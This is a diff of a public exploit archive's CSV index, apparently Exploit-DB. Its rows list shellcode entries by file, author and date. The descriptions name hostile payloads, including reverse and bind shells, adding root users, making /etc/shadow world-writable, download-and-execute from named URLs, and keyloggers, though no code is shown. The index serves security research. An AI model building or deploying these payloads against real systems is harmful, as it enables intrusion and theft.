 17323,platforms/windows/shellcode/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
 17326,platforms/generator/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode,0
@ -16197,8 +16199,8 @@ id,file,description,date,author,platform,type,port
 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17545,platforms/win_x86/shellcode/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
-17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
+17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,osx,shellcode,0
-17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
+17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
 17996,platforms/generator/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,generator,shellcode,0
 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
@ -16214,11 +16216,11 @@ id,file,description,date,author,platform,type,port
 21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
-40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
-24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
+24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
@ -16230,12 +16232,12 @@ id,file,description,date,author,platform,type,port
 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
 40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
-34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
+34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
-35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
+35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL);  Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
@ -16245,7 +16247,7 @@ id,file,description,date,author,platform,type,port
 36411,platforms/generator/shellcode/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",generator,shellcode,0
 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
-36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
+36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
@ -16257,19 +16259,19 @@ id,file,description,date,author,platform,type,port
 36673,platforms/generator/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",generator,shellcode,0
 36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
-36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
+36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
 36779,platforms/win_x86/shellcode/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
 36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
 36781,platforms/generator/shellcode/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode,0
-36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
+36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
-36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
+36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
-37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
+37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
-37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0
+37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0
 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
@ -16304,18 +16306,18 @@ id,file,description,date,author,platform,type,port
 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
-39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
+39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
-39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
@ -16328,15 +16330,15 @@ id,file,description,date,author,platform,type,port
 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
-39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0
+39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0
-39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
+39731,platforms/windows/shellcode/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,windows,shellcode,0
 39754,platforms/win_x86/shellcode/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
 39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
-39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
+39794,platforms/windows/shellcode/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,windows,shellcode,0
 39815,platforms/generator/shellcode/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode,0
 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
-39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39885,platforms/multiple/shellcode/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
@ -16350,7 +16352,7 @@ id,file,description,date,author,platform,type,port
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
-40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
+40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
@ -16368,7 +16370,7 @@ id,file,description,date,author,platform,type,port
 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
-40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:\Users\Public\p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
@ -16385,17 +16387,17 @@ id,file,description,date,author,platform,type,port
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
-41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
-41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
+41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
-41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
+41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
-41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
+41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
 42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
@ -38035,7 +38037,9 @@ id,file,description,date,author,platform,type,port
